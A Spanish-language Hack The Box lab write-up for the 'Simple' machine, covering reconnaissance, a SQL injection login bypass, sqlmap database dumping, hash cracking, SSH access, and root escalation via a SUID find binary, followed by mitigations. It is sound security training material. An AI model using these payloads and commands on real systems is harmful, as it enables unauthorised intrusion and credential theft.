HTB Writeup: Máquina 'Simple' — SQLi + Escalada de Privilegios

371 palabras

2 minutos

HTB Writeup: Máquina 'Simple' — SQLi + Escalada de Privilegios

2025-02-03

CTF Writeups

HTB

/

CTF

/

SQLi

/

Privilege Escalation

/

Linux

Dificultad: Fácil
OS: Linux
Puntos: 20
Estado: Retirada

Reconocimiento#

Escaneo inicial#

1
sudo nmap -sS -sV -sC -p- --min-rate 5000 10.10.11.50 -oN simple.txt

1
PORT   STATE SERVICE VERSION
2
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu
3
80/tcp open  http    Apache httpd 2.4.52

Solo dos puertos abiertos. Vamos al web.

Enumeración Web#

Al entrar a http://10.10.11.50 encontramos un panel de login simple.

1
# Fuzzing de directorios
2
ffuf -w /usr/share/wordlists/dirb/common.txt \
3
     -u http://10.10.11.50/FUZZ \
4
     -fc 404
5

6
# Resultado relevante:
7
# /admin   [Status: 302]
8
# /config  [Status: 403]
9
# /login   [Status: 200]

Identificar tecnología#

1
whatweb http://10.10.11.50
2
# [+] PHP/7.4.3, Apache/2.4.52, Bootstrap/4.5.2

Explotación — SQL Injection#

El formulario de login es vulnerable a inyección SQL básica. Probamos el clásico bypass:

1
Usuario: admin' OR '1'='1
2
Password: cualquiera

Entramos directamente. Pero vamos más allá — extraemos la base de datos completa con sqlmap:

1
# Capturar la request con Burp y guardarla en login.req
2
sqlmap -r login.req --dbs --batch
3

4
# Databases:
5
# [*] information_schema
6
# [*] simpleblog
7

8
# Extraer tablas
9
sqlmap -r login.req -D simpleblog --tables --batch
10
# [+] users
11

12
# Extraer datos de usuarios
13
sqlmap -r login.req -D simpleblog -T users --dump --batch

1
+----+------------------+------------------------------------------+
2
| id | username         | password                                 |
3
+----+------------------+------------------------------------------+
4
| 1  | admin            | $2y$10$hashedpassword...                 |
5
| 2  | john             | $2y$10$anotherhashedpw...                |
6
+----+------------------+------------------------------------------+

Crackear los hashes#

1
# Guardar el hash en un archivo
2
echo '$2y$10$hashedpassword...' > hash.txt
3

4
# Crackear con hashcat (bcrypt = modo 3200)
5
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
6

7
# Resultado: password123

Acceso inicial — SSH#

Con las credenciales crackeadas intentamos SSH:

1
ssh john@10.10.11.50
2
# Password: password123
3

4
john@simple:~$ id
5
uid=1001(john) gid=1001(john) groups=1001(john)
6

7
john@simple:~$ cat user.txt
8
HTB{u53r_fl4g_4qu1}

🎯 User flag obtenida.

Escalada de Privilegios#

Enumeración local#

1
# Buscar binarios con SUID
2
find / -perm -4000 2>/dev/null

1
/usr/bin/find        ← Interesante
2
/usr/bin/sudo
3
/usr/bin/pkexec
4
/bin/su

El binario find con SUID es una escalada clásica. Verificamos en GTFOBins:

1
# Escalada con find SUID
2
/usr/bin/find . -exec /bin/sh -p \; -quit
3

4
# sh-5.1# id
5
uid=1001(john) gid=1001(john) euid=0(root) groups=1001(john)
6

7
# sh-5.1# cat /root/root.txt
8
HTB{r00t_fl4g_pwn3d!}

🎯 Root flag obtenida. ¡Máquina completada!

Lecciones aprendidas#

Nunca concatenar input del usuario directamente en queries SQL — usar prepared statements
Los binarios SUID mal configurados son vectores críticos de escalada de privilegios
La enumeración sistemática es clave — no saltar pasos

Mitigaciones#

1
// MAL — vulnerable a SQLi
2
$query = "SELECT * FROM users WHERE user='$username'";
3

4
// BIEN — prepared statement
5
$stmt = $pdo->prepare("SELECT * FROM users WHERE user=?");
6
$stmt->execute([$username]);

1
# Revisar y remover SUID innecesarios
2
chmod u-s /usr/bin/find

¿Dudas o correcciones? Encuéntrame en Twitter como @Oguiii 🔐

HTB Writeup: Máquina 'Simple' — SQLi + Escalada de Privilegios

https://oguiii.xyz/posts/htb-writeup-simple/

Autor

Oguiii

Publicado el

2025-02-03

Licencia

CC BY-NC-SA 4.0

Metodología de Pentesting Web: De 0 a reporte profesional

Guía completa de Nmap: Reconocimiento de redes desde cero

Identificar tecnología

3

Explotación — SQL Injection

Escalada de Privilegios